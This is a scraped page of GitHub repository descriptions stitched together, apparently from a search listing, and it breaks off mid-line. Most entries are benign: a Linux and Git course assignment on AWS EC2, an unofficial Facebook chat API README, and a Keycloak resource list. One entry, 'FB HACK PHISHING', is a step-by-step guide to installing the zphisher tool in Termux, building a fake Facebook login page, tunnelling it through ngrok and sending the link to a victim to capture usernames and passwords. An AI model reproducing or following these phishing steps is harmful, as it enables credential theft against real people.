348 skills found · Page 4 of 12
nyaundid / EC2 AWS AND SHELLSEIS 665 Assignment 2: Linux & Git Overview This week we will focus on becoming familiar with launching a Linux server and working with some basic Linux and Git commands. We will use AWS to launch and host the Linux server. AWS might seem a little confusing at this point. Don’t worry, we will gain much more hands-on experience with AWS throughout the course. The goal is to get you comfortable working with the technology and not overwhelm you with all the details. Requirements You need to have a personal AWS account and GitHub account for this assignment. You should also read the Git Hands-on Guide and Linux Hands-on Guide before beginning this exercise. A word about grading One of the key DevOps practices we learn about in this class is the use of automation to increase the speed and repeatability of processes. Automation is utilized during the assignment grading process to review and assess your work. It’s important that you follow the instructions in each assignment and type in required files and resources with the proper names. All names are case sensitive, so a name like "Web1" is not the same as "web1". If you misspell a name, use the wrong case, or put a file in the wrong directory location you will lose points on your assignment. This is the easiest way to lose points, and also the most preventable. You should always double-check your work to make sure it accurately reflects the requirements specified in the assignment. You should always carefully review the content of your files before submitting your assignment. The assignment Let’s get started! Create GitHub repository The first step in the assignment is to setup a Git repository on GitHub. We will use a special solution called GitHub Classroom for this course which automates the process of setting up student assignment repositories. Here are the basic steps: Click on the following link to open Assignment 2 on the GitHub Classroom site: https://classroom.github.com/a/K4zcVmX- (Links to an external site.)Links to an external site. Click on the Accept this assignment button. GitHub Classroom will provide you with a URL (https) to access the assignment repository. Either copy this address to your clipboard or write it down somewhere. You will need to use this address to set up the repository on a Linux server. Example: https://github.com/UST-SEIS665/hw2-seis665-02-spring2019-<your github id>.git At this point your new repository to ready to use. The repository is currently empty. We will put some content in there soon! Launch Linux server The second step in the assignment is to launch a Linux server using AWS EC2. The server should have the following characteristics: Amazon Linux 2 AMI 64-bit (usually the first option listed) Located in a U.S. region (us-east-1) t2.micro instance type All default instance settings (storage, vpm, security group, etc.) I’ve shown you how to launch EC2 instances in class. You can review it on Canvas. Once you launch the new server, it may take a few minutes to provision. Log into server The next step is to log into the Linux server using a terminal program with a secure shell (SSH) support. You can use iTerm2 (Links to an external site.)Links to an external site. on a Mac and GitBash/PuTTY (Links to an external site.)Links to an external site. on a PC. You will need to have the private server key and the public IP address before attempting to log into the server. The server key is basically your password. If you lose it, you will need to terminate the existing instance and launch a new server. I recommend reusing the same key when launching new servers throughout the class. Note, I make this recommendation to make the learning process easier and not because it is a common security practice. I’ve shown you how to use a terminal application to log into the instance using a Windows desktop. Your personal computer or lab computer may be running a different OS version, but the process is still very similar. You can review the videos on the Canvas. Working with Linux If you’ve made it this far, congratulations! You’ve made it over the toughest hurdle. By the end of this course, I promise you will be able to launch and log into servers in your sleep. You should be looking at a login screen that looks something like this: Last login: Mon Mar 21 21:17:54 2016 from 174-20-199-194.mpls.qwest.net __| __|_ ) _| ( / Amazon Linux AMI ___|\___|___| https://aws.amazon.com/amazon-linux-ami/2015.09-release-notes/ 8 package(s) needed for security, out of 17 available Run "sudo yum update" to apply all updates. ec2-user@ip-172-31-15-26 ~]$ Your terminal cursor is sitting at the shell prompt, waiting for you to type in your first command. Remember the shell? It is a really cool program that lets you start other programs and manage services on the Linux system. The rest of this assignment will be spent working with the shell. Note, when you are asked to type in a command in the steps below, don’t type in the dollar-sign ($) character. This is just meant to represent the command prompt. The actual commands are represented by the characters to the right of the command prompt. Let’s start by asking the shell for some help. Type in: $ help The shell provides you with a list of commands you can run along with possible command options. Next, check out one of the pages in the built-in manual: $ man ls A man page will appear with information on how to use the ls command. This command is used to list the contents of file directories. Either space through the contents of the man page or hit q to exit. Most of the core Linux commands have man pages available. But honestly, some of these man pages are a bit hard to understand. Sometimes your best bet is to search on Google if you are trying to figure out how to use a specific command. When you initially log into Linux, the system places you in your home directory. Each user on the system has a separate home directory. Let’s see where your home directory is located: $ pwd The response should be /home/ec2-user. The pwd command is handy to remember if you ever forget what file directory you are currently located in. If you recall from the Linux Hands-on Guide, this directory is also your current working directory. Type in: $ cd / The cd command let’s you change to a new working directory on the server. In this case, we changed to the root (/) directory. This is the parent of all the other directories on the file system. Type in: $ ls The ls command lists the contents of the current directory. As you can see, root directory contains many other directories. You will become familiar with these directories over time. The ls command provides a very basic directory listing. You need to supply the command with some options if you want to see more detailed information. Type in: $ ls -la See how this command provides you with much more detailed information about the files and directories? You can use this detailed listing to see the owner, group, and access control list settings for each file or directory. Do you see any files listed? Remember, the first character in the access control list column denotes whether a listed item is a file or a directory. You probably see a couple files with names like .autofsck. How come you didn’t see this file when you typed in the lscommand without any options? (Try to run this command again to convince yourself.) Files names that start with a period are called hidden files. These files won’t appear on normal directory listings. Type in: $ cd /var Then, type in: $ ls You will see a directory listing for the /var directory. Next, type in: $ ls .. Huh. This directory listing looks the same as the earlier root directory listing. When you use two periods (..) in a directory path that means you are referring to the parent directory of the current directory. Just think of the two dots as meaning the directory above the current directory. Now, type in: $ cd ~ $ pwd Whoa. We’re back at our home directory again. The tilde character (~) is another one of those handy little directory path shortcuts. It always refers to our personal home directory. Keep in mind that since every user has their own home directory, the tilde shortcut will refer to a unique directory for each logged-in user. Most students are used to navigating a file system by clicking a mouse in nested graphical folders. When they start using a command-line to navigate a file system, they sometimes get confused and lose track of their current position in the file system. Remember, you can always use the pwd command to quickly figure out what directory you are currently working in. Let’s make some changes to the file system. We can easily make our own directories on the file system. Type: mkdir test Now type: ls Cool, there’s our new test directory. Let’s pretend we don’t like that directory name and delete it. Type: rmdir test Now it’s gone. How can you be sure? You should know how to check to see if the directory still exists at this point. Go ahead and check. Let’s create another directory. Type in: $ mkdir documents Next, change to the new directory: $ cd documents Did you notice that your command prompt displays the name of the current directory? Something like: [ec2-user@ip-172-31-15-26 documents]$. Pretty handy, huh? Okay, let’s create our first file in the documents directory. This is just an empty file for training purposes. Type in: $ touch paper.txt Check to see that the new file is in the directory. Now, go back to the previous directory. Remember the double dot shortcut? $ cd .. Okay, we don’t like our documents directory any more. Let’s blow it away. Type in: $ rmdir documents Uh oh. The shell didn’t like that command because the directory isn’t empty. Let’s change back into the documents directory. But this time don’t type in the full name of the directory. You can let shell auto-completion do the typing for you. Type in the first couple characters of the directory name and then hit the tab key: $ cd doc<tab> You should use the tab auto-completion feature often. It saves typing and makes working with the Linux file system much much easier. Tab is your friend. Now, remove the file by typing: $ rm paper.txt Did you try to use the tab key instead of typing in the whole file name? Check to make sure the file was deleted from the directory. Next, create a new file: $ touch file1 We like file1 so much that we want to make a backup copy. Type: $ cp file1 file1-backup Check to make sure the new backup copy was created. We don’t really like the name of that new file, so let’s rename it. Type: $ mv file1-backup backup Moving a file to the same directory and giving it a new name is basically the same thing as renaming it. We could have moved it to a different directory if we wanted. Let’s list all of the files in the current directory that start with the letter f: $ ls f* Using wildcard pattern matching in file commands is really useful if you want the command to impact or filter a group of files. Now, go up one directory to the parent directory (remember the double dot shortcut?) We tried to remove the documents directory earlier when it had files in it. Obviously that won’t work again. However, we can use a more powerful command to destroy the directory and vanquish its contents. Behold, the all powerful remove command: $ rm -fr documents Did you remember to use auto-completion when typing in documents? This command and set of options forcibly removes the directory and its contents. It’s a dangerous command wielded by the mightiest Linux wizards. Okay, maybe that’s a bit of an exaggeration. Just be careful with it. Check to make sure the documents directory is gone before proceeding. Let’s continue. Change to the directory /var and make a directory called test. Ugh. Permission denied. We created this darn Linux server and we paid for it. Shouldn’t we be able to do anything we want on it? You logged into the system as a user called ec2-user. While this user can create and manage files in its home directory, it cannot change files all across the system. At least it can’t as a normal user. The ec2-user is a member of the root group, so it can escalate its privileges to super-user status when necessary. Let’s try it: $ sudo mkdir test Check to make sure the directory exists now. Using sudo we can execute commands as a super-user. We can do anything we want now that we know this powerful new command. Go ahead and delete the test directory. Did you remember to use sudo before the rmdir command? Check to make sure the directory is gone. You might be asking yourself the question: why can we list the contents of the /var directory but not make changes? That’s because all users have read access to the /var directory and the ls command is a read function. Only the root users or those acting as a super-user can write changes to the directory. Let’s go back to our home directory: $ cd ~ Editing text files is a really common task on Linux systems because many of the application configuration files are text files. We can create a text file by using a text editor. Type in: $ nano myfile.conf The shell starts up the nano text editor and places your terminal cursor in the editing screen. Nano is a simple text-based word processor. Type in a few lines of text. When you’re done writing your novel, hit ctrl-x and answer y to the prompt to save your work. Finally, hit enter to save the text to the filename you specified. Check to see that your file was saved in the directory. You can take a look at the contents of your file by typing: $ cat myfile.conf The cat command displays your text file content on the terminal screen. This command works fine for displaying small text files. But if your file is hundreds of lines long, the content will scroll down your terminal screen so fast that you won’t be able to easily read it. There’s a better way to view larger text files. Type in: $ less myfile.conf The less command will page the display of a text file, allowing you to page through the contents of the file using the space bar. Your text file is probably too short to see the paging in action though. Hit q to quit out of the less text viewer. Hit the up-arrow key on your keyboard a few times until the commmand nano myfile.conf appears next to your command prompt. Cool, huh? The up-arrow key allows you to replay a previously run command. Linux maintains a list of all the commands you have run since you logged into the server. This is called the command history. It’s a really useful feature if you have to re-run a complex command again. Now, hit ctrl-c. This cancels whatever command is displayed on the command line. Type in the following command to create a couple empty files in the directory: $ touch file1 file2 file3 Confirm that the files were created. Some commands, like touch. allow you to specify multiple files as arguments. You will find that Linux commands have all kinds of ways to make tasks more efficient like this. Throughout this assignment, we have been running commands and viewing results on the terminal screen. The screen is the standard place for commands to output results. It’s known as the standard out (stdout). However, it’s really useful to output results to the file system sometimes. Type in: $ ls > listing.txt Take a look at the directory listing now. You just created a new file. View the contents of the listing.txt file. What do you see? Instead of sending the output from the ls command to the screen we sent it to a text file. Let’s try another one. Type: $ cat myfile.conf > listing.txt Take a look at the contents of the listing.txt file again. It looks like your myfile.conf file now. It’s like you made a copy of it. But what happened to the previous content in the listing.txt file? When you redirect the output of a command using the right angle-bracket character (>), the output overwrites the existing file. Type this command in: $ cat myfile.conf >> listing.txt Now look at the contents of the listing.txt file. You should see your original content displayed twice. When you use two angle-bracket characters in the commmand the output appends (or adds to) the file instead of overwriting it. We redirected the output from a command to a text file. It’s also possible to redirect the input to a command. Typically we use a keyboard to provide input, but sometimes it makes more sense to input a file to a command. For example, how many words are in your new listing.txt file? Let’s find out. Type in: $ wc -w < listing.txt Did you get a number? This command inputs the listing.txt file into a word count program called wc. Type in the command: $ ls /usr/bin The terminal screen probably scrolled quickly as filenames flashed by. The /usr/bin directory holds quite a few files. It would be nice if we could page through the contents of this directory. Well, we can. We can use a special shell feature called pipes. In previous steps, we redirected I/O using the file system. Pipes allow us to redirect I/O between programs. We can redirect the output from one program into another. Type in: $ ls /usr/bin | less Now the directory listing is paged. Hit the spacebar to page through the listing. The pipe, represented by a vertical bar character (|), takes the output from the ls command and redirects it to the less command where the resulting output is paged. Pipes are super powerful and used all the time by savvy Linux operators. Hit the q key to quit the paginated directory listing command. Working with shell scripts Now things are going to get interesting. We’ve been manually typing in commands throughout this exercise. If we were running a set of repetitive tasks, we would want to automate the process as much as possible. The shell makes it really easy to automate tasks using shell scripts. The shell provides many of the same features as a basic procedural programming language. Let’s write some code. Type in this command: $ j=123 $ echo $j We just created a variable named j referencing the string 123. The echo command printed out the value of the variable. We had to use a dollar sign ($) when referencing the variable in another command. Next, type in: $ j=1+1 $ echo $j Is that what you expected? The shell just interprets the variable value as a string. It’s not going to do any sort of computation. Typing in shell script commands on the command line is sort of pointless. We want to be able to create scripts that we can run over-and-over. Let’s create our first shell script. Use the nano editor to create a file named myscript. When the file is open in the editor, type in the following lines of code: #!/bin/bash echo Hello $1 Now quit the editor and save your file. We can run our script by typing: $ ./myscript World Er, what happened? Permission denied. Didn’t we create this file? Why can’t we run it? We can’t run the script file because we haven’t set the execute permission on the file. Type in: $ chmod u+x myscript This modifies the file access control list to allow the owner of the file to execute it. Let’s try to run the command again. Hit the up-arrow key a couple times until the ./myscript World command is displayed and hit enter. Hooray! Our first shell script. It’s probably a bit underwhelming. No problem, we’ll make it a little more complex. The script took a single argument called World. Any arguments provided to a shell script are represented as consecutively numbered variables inside the script ($1, $2, etc). Pretty simple. You might be wondering why we had to type the ./ characters before the name of our script file. Try to type in the command without them: $ myscript World Command not found. That seems a little weird. Aren’t we currently in the directory where the shell script is located? Well, that’s just not how the shell works. When you enter a command into the shell, it looks for the command in a predefined set of directories on the server called your PATH. Since your script file isn’t in your special path, the shell reports it as not found. By typing in the ./ characters before the command name you are basically forcing the shell to look for your script in the current directory instead of the default path. Create another file called cleanup using nano. In the file editor window type: #!/bin/bash # My cleanup script mkdir archive mv file* archive Exit the editor window and save the file. Change the permissions on the script file so that you can execute it. Now run the command: $ ./cleanup Take a look at the file directory listing. Notice the archive directory? List the contents of that directory. The script automatically created a new directory and moved three files into it. Anything you can do manually at a command prompt can be automated using a shell script. Let’s create one more shell script. Use nano to create a script called namelist. Here is the content of the script: #!/bin/bash # for-loop test script names='Jason John Jane' for i in $names do echo Hello $i done Change the permissions on the script file so that you can execute it. Run the command: $ ./namelist The script will loop through a set of names stored in a variable displaying each one. Scripts support several programming constructs like for-loops, do-while loops, and if-then-else. These building blocks allow you to create fairly complex scripts for automating tasks. Installing packages and services We’re nearing the end of this assignment. But before we finish, let’s install some new software packages on our server. The first thing we should do is make sure all the current packages installed on our Linux server are up-to-date. Type in: $ sudo yum update -y This is one of those really powerful commands that requires sudo access. The system will review the currently installed packages and go out to the Internet and download appropriate updates. Next, let’s install an Apache web server on our system. Type in: $ sudo yum install httpd -y Bam! You probably never knew that installing a web server was so easy. We’re not going to actually use the web server in this exercise, but we will in future assignments. We installed the web server, but is it actually running? Let’s check. Type in: $ sudo service httpd status Nope. Let’s start it. Type: $ sudo service httpd start We can use the service command to control the services running on the system. Let’s setup the service so that it automatically starts when the system boots up. Type in: $ sudo chkconfig httpd on Cool. We installed the Apache web server on our system, but what other programs are currently running? We can use the pscommand to find out. Type in: $ ps -ax Lots of processes are running on our system. We can even look at the overall performance of our system using the topcommand. Let’s try that now. Type in: $ top The display might seem a little overwhelming at first. You should see lots of performance information displayed including the cpu usage, free memory, and a list of running tasks. We’re almost across the finish line. Let’s make sure all of our valuable work is stored in a git repository. First, we need to install git. Type in the command: $ sudo yum install git -y Check your work It’s very important to check your work before submitting it for grading. A misspelled, misplaced or missing file will cost you points. This may seem harsh, but the reality is that these sorts of mistakes have consequences in the real world. For example, a server instance could fail to launch properly and impact customers because a single required file is missing. Here is what the contents of your git repository should look like before final submission: ┣archive ┃ ┣ file1 ┃ ┣ file2 ┃ ┗ file3 ┣ namelist ┗ myfile.conf Saving our work in the git repository Next, make sure you are still in your home directory (/home/ec2-user). We will install the git repository you created at the beginning of this exercise. You will need to modify this command by typing in the GitHub repository URL you copied earlier. $ git clone <your GitHub URL here>.git Example: git clone https://github.com/UST-SEIS665/hw2-seis665-02-spring2019-<your github id>.git The git application will ask you for your GitHub username and password. Note, if you have multi-factor authentication enabled on your GitHub account you will need to provide a personal token instead of your password. Git will clone (copy) the repository from GitHub to your Linux server. Since the repository is empty the clone happens almost instantly. Check to make sure that a sub-directory called "hw2-seis665-02-spring2019-<username>" exists in the current directory (where <username> is your GitHub account name). Git automatically created this directory as part of the cloning process. Change to the hw2-seis665-02-spring2019-<username> directory and type: $ ls -la Notice the .git hidden directory? This is where git actually stores all of the file changes in your repository. Nothing is actually in your repository yet. Change back to the parent directory (cd ..). Next, let’s move some of our files into the repository. Type: $ mv archive hw2-seis665-02-spring2019-<username> $ mv namelist hw2-seis665-02-spring2019-<username> $ mv myfile.conf hw2-seis665-02-spring2019-<username> Hopefully, you remembered to use the auto-complete function to reduce some of that typing. Change to the hw2-seis665-02-spring2019-<username> directory and list the directory contents. Your files are in the working directory, but are not actually stored in the repository because they haven’t been committed yet. Type in: $ git status You should see a list of untracked files. Let’s tell git that we want these files tracked. Type in: $ git add * Now type in the git status command again. Notice how all the files are now being tracked and are ready to be committed. These files are in the git staging area. We’ll commit them to the repository next. Type: $ git commit -m 'assignment 2 files' Next, take a look at the commit log. Type: $ git log You should see your commit listed along with an assigned hash (long string of random-looking characters). Finally, let’s save the repository to our GitHub account. Type in: $ git push origin master The git client will ask you for your GitHub username and password before pushing the repository. Go back to the GitHub.com website and login if you have been logged out. Click on the repository link for the assignment. Do you see your files listed there? Congratulations, you completed the exercise! Terminate server The last step is to terminate your Linux instance. AWS will bill you for every hour the instance is running. The cost is nominal, but there’s no need to rack up unnecessary charges. Here are the steps to terminate your instance: Log into your AWS account and click on the EC2 dashboard. Click the Instances menu item. Select your server in the instances table. Click on the Actions drop down menu above the instances table. Select the Instance State menu option Click on the Terminate action. Your Linux instance will shutdown and disappear in a few minutes. The EC2 dashboard will continue to display the instance on your instance listing for another day or so. However, the state of the instance will be terminated. Submitting your assignment — IMPORTANT! If you haven’t already, please e-mail me your GitHub username in order to receive credit for this assignment. There is no need to email me to tell me that you have committed your work to GitHub or to ask me if your GitHub submission worked. If you can see your work in your GitHub repository, I can see your work.
Zakwan96 / FB HACK PHISHING<br> Step 1 - Install Termux App on your Android smartphone .<br> <br> <br> Step 2 - type commands as shown below :-<br> <br> <br> <br> $ apt update && apt upgrade<br> <br> <br> <br> <br> $ pkg install git<br> <br> <br> <br> $ pkg install php<br> <br> <br> <br> $ pkg install openssh<br> <br> <br> <br> $ git clone https://github.com/htr-tech/zphisher<br> <br> <br> <br> <br> $ cd zphisher<br> <br> <br> <br> $ chmod +x *<br> <br> <br> <br> $ bash zphisher.sh<br> <br> <br> <br> now turn on your mobile hotspot <br> <br> <img src="content://com.samsung.android.memo/file/a9d1a56f-a836-d155-0000-0176230ec487" orientation="0" altText="" width="484" /><br> <br> <br> Now select, of which social site you want to make phishing page. By enter number <br> <br> <br> ~I choose 1 for facebook phishing page <br> <br> <br> <br> <br> <br> <img src="content://com.samsung.android.memo/file/a9d1a56f-a836-d155-0000-0176230ed222" orientation="0" altText="" width="484" /><br> <br> <br> <br> here you see, 4 options on which you able to make phishing page.<br> <br> <br> All of them look like original page , so it is easy to gain victim trust<br> <br> <br> <br> ~so here, I select 3 (fake security login page)<br> <br> <br> <img src="content://com.samsung.android.memo/file/a9d1a56f-a836-d155-0000-0176230ed5ad" orientation="0" altText="" width="484" /><br> <br> <br> <br> Now here, you have to select 2 (Ngrok.io) it is good for generate link <br> <br> <br> Note :- make sure your hotspot is ON<br> <br> <br> <br> <img src="null" orientation="0" altText="" width="484" /><br> <br> <br> <br> Here you see in above picture, you get link......<br> <br> <br> Now copy this link & send to your victim, when victim open this link in his browser :-<br> <br> <br> <img src="null" orientation="0" altText="" width="484" /><br> <br> Victim see this (as shown in above picture)<br> <br> <br> It is same as original page of facebook so victim trust it easily and now victim entered his details like:- username , passwords. <br> <br> <br> After victim type his details.
Tinkprocodes / Fca UnofficialThis repo is a fork from main repo and will usually have new features bundled faster than main repo (and maybe bundle some bugs, too). # Unofficial Facebook Chat API <img alt="version" src="https://img.shields.io/github/package-json/v/ProCoderMew/fca-unofficial?label=github&style=flat-square"> Facebook now has an official API for chat bots [here](https://developers.facebook.com/docs/messenger-platform). This API is the only way to automate chat functionalities on a user account. We do this by emulating the browser. This means doing the exact same GET/POST requests and tricking Facebook into thinking we're accessing the website normally. Because we're doing it this way, this API won't work with an auth token but requires the credentials of a Facebook account. _Disclaimer_: We are not responsible if your account gets banned for spammy activities such as sending lots of messages to people you don't know, sending messages very quickly, sending spammy looking URLs, logging in and out very quickly... Be responsible Facebook citizens. See [below](#projects-using-this-api) for projects using this API. ## Install If you just want to use fca-unofficial, you should use this command: ```bash npm install procodermew/fca-unofficial ``` It will download `fca-unofficial` from NPM repositories ## Testing your bots If you want to test your bots without creating another account on Facebook, you can use [Facebook Whitehat Accounts](https://www.facebook.com/whitehat/accounts/). ## Example Usage ```javascript const login = require("fca-unofficial"); // Create simple echo bot login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => { if(err) return console.error(err); api.listen((err, message) => { api.sendMessage(message.body, message.threadID); }); }); ``` Result: <img width="517" alt="screen shot 2016-11-04 at 14 36 00" src="https://cloud.githubusercontent.com/assets/4534692/20023545/f8c24130-a29d-11e6-9ef7-47568bdbc1f2.png"> ## Documentation You can see it [here](DOCS.md). ## Main Functionality ### Sending a message #### api.sendMessage(message, threadID[, callback][, messageID]) Various types of message can be sent: * *Regular:* set field `body` to the desired message as a string. * *Sticker:* set a field `sticker` to the desired sticker ID. * *File or image:* Set field `attachment` to a readable stream or an array of readable streams. * *URL:* set a field `url` to the desired URL. * *Emoji:* set field `emoji` to the desired emoji as a string and set field `emojiSize` with size of the emoji (`small`, `medium`, `large`) Note that a message can only be a regular message (which can be empty) and optionally one of the following: a sticker, an attachment or a url. __Tip__: to find your own ID, you can look inside the cookies. The `userID` is under the name `c_user`. __Example (Basic Message)__ ```js const login = require("fca-unofficial"); login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => { if(err) return console.error(err); var yourID = "000000000000000"; var msg = "Hey!"; api.sendMessage(msg, yourID); }); ``` __Example (File upload)__ ```js const login = require("fca-unofficial"); login({email: "FB_EMAIL", password: "FB_PASSWORD"}, (err, api) => { if(err) return console.error(err); // Note this example uploads an image called image.jpg var yourID = "000000000000000"; var msg = { body: "Hey!", attachment: fs.createReadStream(__dirname + '/image.jpg') } api.sendMessage(msg, yourID); }); ``` ------------------------------------ ### Saving session. To avoid logging in every time you should save AppState (cookies etc.) to a file, then you can use it without having password in your scripts. __Example__ ```js const fs = require("fs"); const login = require("fca-unofficial"); var credentials = {email: "FB_EMAIL", password: "FB_PASSWORD"}; login(credentials, (err, api) => { if(err) return console.error(err); fs.writeFileSync('appstate.json', JSON.stringify(api.getAppState())); }); ``` Alternative: Use [c3c-fbstate](https://github.com/c3cbot/c3c-fbstate) to get fbstate.json (appstate.json) ------------------------------------ ### Listening to a chat #### api.listen(callback) Listen watches for messages sent in a chat. By default this won't receive events (joining/leaving a chat, title change etc…) but it can be activated with `api.setOptions({listenEvents: true})`. This will by default ignore messages sent by the current account, you can enable listening to your own messages with `api.setOptions({selfListen: true})`. __Example__ ```js const fs = require("fs"); const login = require("fca-unofficial"); // Simple echo bot. It will repeat everything that you say. // Will stop when you say '/stop' login({appState: JSON.parse(fs.readFileSync('appstate.json', 'utf8'))}, (err, api) => { if(err) return console.error(err); api.setOptions({listenEvents: true}); var stopListening = api.listenMqtt((err, event) => { if(err) return console.error(err); api.markAsRead(event.threadID, (err) => { if(err) console.error(err); }); switch(event.type) { case "message": if(event.body === '/stop') { api.sendMessage("Goodbye…", event.threadID); return stopListening(); } api.sendMessage("TEST BOT: " + event.body, event.threadID); break; case "event": console.log(event); break; } }); }); ``` ## FAQS 1. How do I run tests? > For tests, create a `test-config.json` file that resembles `example-config.json` and put it in the `test` directory. From the root >directory, run `npm test`. 2. Why doesn't `sendMessage` always work when I'm logged in as a page? > Pages can't start conversations with users directly; this is to prevent pages from spamming users. 3. What do I do when `login` doesn't work? > First check that you can login to Facebook using the website. If login approvals are enabled, you might be logging in incorrectly. For how to handle login approvals, read our docs on [`login`](DOCS.md#login). 4. How can I avoid logging in every time? Can I log into a previous session? > We support caching everything relevant for you to bypass login. `api.getAppState()` returns an object that you can save and pass into login as `{appState: mySavedAppState}` instead of the credentials object. If this fails, your session has expired. 5. Do you support sending messages as a page? > Yes, set the pageID option on login (this doesn't work if you set it using api.setOptions, it affects the login process). > ```js > login(credentials, {pageID: "000000000000000"}, (err, api) => { … } > ``` 6. I'm getting some crazy weird syntax error like `SyntaxError: Unexpected token [`!!! > Please try to update your version of node.js before submitting an issue of this nature. We like to use new language features. 7. I don't want all of these logging messages! > You can use `api.setOptions` to silence the logging. You get the `api` object from `login` (see example above). Do > ```js > api.setOptions({ > logLevel: "silent" > }); > ``` <a name="projects-using-this-api"></a> ## Projects using this API: - [c3c](https://github.com/lequanglam/c3c) - A bot that can be customizable using plugins. Support Facebook & Discord. - [Miraiv2](https://github.com/miraiPr0ject/miraiv2) - A simple Facebook Messenger Bot made by CatalizCS and SpermLord. ## Projects using this API (original repository, facebook-chat-api): - [Messer](https://github.com/mjkaufer/Messer) - Command-line messaging for Facebook Messenger - [messen](https://github.com/tomquirk/messen) - Rapidly build Facebook Messenger apps in Node.js - [Concierge](https://github.com/concierge/Concierge) - Concierge is a highly modular, easily extensible general purpose chat bot with a built in package manager - [Marc Zuckerbot](https://github.com/bsansouci/marc-zuckerbot) - Facebook chat bot - [Marc Thuckerbot](https://github.com/bsansouci/lisp-bot) - Programmable lisp bot - [MarkovsInequality](https://github.com/logicx24/MarkovsInequality) - Extensible chat bot adding useful functions to Facebook Messenger - [AllanBot](https://github.com/AllanWang/AllanBot-Public) - Extensive module that combines the facebook api with firebase to create numerous functions; no coding experience is required to implement this. - [Larry Pudding Dog Bot](https://github.com/Larry850806/facebook-chat-bot) - A facebook bot you can easily customize the response - [fbash](https://github.com/avikj/fbash) - Run commands on your computer's terminal over Facebook Messenger - [Klink](https://github.com/KeNt178/klink) - This Chrome extension will 1-click share the link of your active tab over Facebook Messenger - [Botyo](https://github.com/ivkos/botyo) - Modular bot designed for group chat rooms on Facebook - [matrix-puppet-facebook](https://github.com/matrix-hacks/matrix-puppet-facebook) - A facebook bridge for [matrix](https://matrix.org) - [facebot](https://github.com/Weetbix/facebot) - A facebook bridge for Slack. - [Botium](https://github.com/codeforequity-at/botium-core) - The Selenium for Chatbots - [Messenger-CLI](https://github.com/AstroCB/Messenger-CLI) - A command-line interface for sending and receiving messages through Facebook Messenger. - [AssumeZero-Bot](https://github.com/AstroCB/AssumeZero-Bot) – A highly customizable Facebook Messenger bot for group chats. - [Miscord](https://github.com/Bjornskjald/miscord) - An easy-to-use Facebook bridge for Discord. - [chat-bridge](https://github.com/rexx0520/chat-bridge) - A Messenger, Telegram and IRC chat bridge. - [messenger-auto-reply](https://gitlab.com/theSander/messenger-auto-reply) - An auto-reply service for Messenger. - [BotCore](https://github.com/AstroCB/BotCore) – A collection of tools for writing and managing Facebook Messenger bots. - [mnotify](https://github.com/AstroCB/mnotify) – A command-line utility for sending alerts and notifications through Facebook Messenger.
PrincewillIroka / Login With GithubAn app that implements "Login with GitHub" functionality in React JS
m-haecker / Nestjs Social LoginOAuth2 in NestJS for Social Login with GitHub (Google, Facebook, …)
BabyJ723 / Blast ON# Awesome Keycloak [](https://github.com/sindresorhus/awesome) # [<img src="https://www.keycloak.org/resources/images/keycloak_logo_480x108.png">](https://github.com/thomasdarimont/awesome-keycloak) > Carefully curated list of awesome Keycloak resources. A curated list of resources for learning about the Open Source Identity and Access Management solution Keycloak. Contains books, websites, blog posts, links to github Repositories. # Contributing Contributions welcome. Add links through pull requests or create an issue to start a discussion. [Please refer to the contributing guide for details](CONTRIBUTING.md). # Contents * [General](#general) * [Documentation](#docs) * [Keycloak Website](http://www.keycloak.org) * [Current Documentation](http://www.keycloak.org/documentation.html) * [Archived Documentation](http://www.keycloak.org/documentation-archive.html) * [Mailing Lists](#mailing-lists) * [User Mailing List](#user-mailing-list) * [Developer Mailing List](#dev-mailing-list) * [Mailing List Search](#mailing-list-search) * [Books](#books) * [Articles](#articles) * [Talks](#talks) * [Presentations](#presentations) * [Video Playlists](#video-playlists) * [Community Extensions](#community-extensions) * [Integrations](#integrations) * [Themes](#themes) * [Docker](#docker) * [Deployment Examples](#deployment-examples) * [Example Projects](#example-projects) * [Benchmarks](#benchmarks) * [Help](#help) * [Commercial Offerings](#commercial-offerings) * [Miscellaneous](#miscellaneous) # General ## Documentation * [Keycloak Website](http://www.keycloak.org/) * [Current Documentation](http://www.keycloak.org/documentation.html) * [Archived Documentation](http://www.keycloak.org/documentation-archive.html) * [Product Documentation for Red Hat Single Sign-On](https://access.redhat.com/documentation/en/red-hat-single-sign-on/) ## Discussion Groups and Mailing Lists * [Keycloak Users Google Group](https://groups.google.com/forum/#!forum/keycloak-user) * [Keycloak Developers Google Group](https://groups.google.com/forum/#!forum/keycloak-dev) * [Keycloak Discourse Group](https://keycloak.discourse.group/) * [Keycloak Developer Chat](https://keycloak.zulipchat.com) * [Inactive - User Mailing List](https://lists.jboss.org/mailman/listinfo/keycloak-user) * [Inactive - Developer Mailing List](https://lists.jboss.org/mailman/listinfo/keycloak-dev) * [Mailing List Search](http://www.keycloak.org/search) * [Keycloak Subreddit](https://www.reddit.com/r/keycloak) ## Books * [Keycloak - Identity and Access Management for Modern Applications](https://www.packtpub.com/product/keycloak-identity-and-access-management-for-modern-applications/9781800562493) ## Articles * [How to get Keycloak working with Docker](https://www.ivonet.nl/2015/05/23/Keycloak-Docker/) * [Single-Sign-On for Microservices and/or Java EE applications with Keycloak SSO](http://www.n-k.de/2016/06/keycloak-sso-for-microservices.html) * [Keycloak Admin Client(s) - multiple ways to manage your SSO system](http://www.n-k.de/2016/08/keycloak-admin-client.html) * [How to get the AccessToken of Keycloak in Spring Boot and/or Java EE](http://www.n-k.de/2016/05/how-to-get-accesstoken-from-keycloak-springboot-javaee.html) * [JWT authentication with Vert.x, Keycloak and Angular 2](http://paulbakker.io/java/jwt-keycloak-angular2/) * [Authenticating via Kerberos with Keycloak and Windows 2008 Active Directory](http://matthewcasperson.blogspot.de/2015/07/authenticating-via-kerberos-with.html) * [Deploying Keycloak with Ansible](https://adam.younglogic.com/2016/01/deploying-keycloak-via-ansible/) * [Easily secure your Spring Boot applications with Keycloak](https://developers.redhat.com/blog/2017/05/25/easily-secure-your-spring-boot-applications-with-keycloak/) * [How Red Hat re-designed its Single Sign On (SSO) architecture, and why](https://developers.redhat.com/blog/2016/10/04/how-red-hat-re-designed-its-single-sign-on-sso-architecture-and-why/) * [OAuth2, JWT, Open-ID Connect and other confusing things](http://giallone.blogspot.de/2017/06/oath2.html) * [X509 Authentication with Keycloak and JBoss Fuse](https://sjhiggs.github.io/fuse/sso/x509/smartcard/2017/03/29/fuse-hawtio-keycloak.html) * [Running Keycloak on OpenShift 3](https://medium.com/@sbose78/running-keycloak-on-openshift-3-8d195c0daaf6) * [Introducing Keycloak for Identity and Access 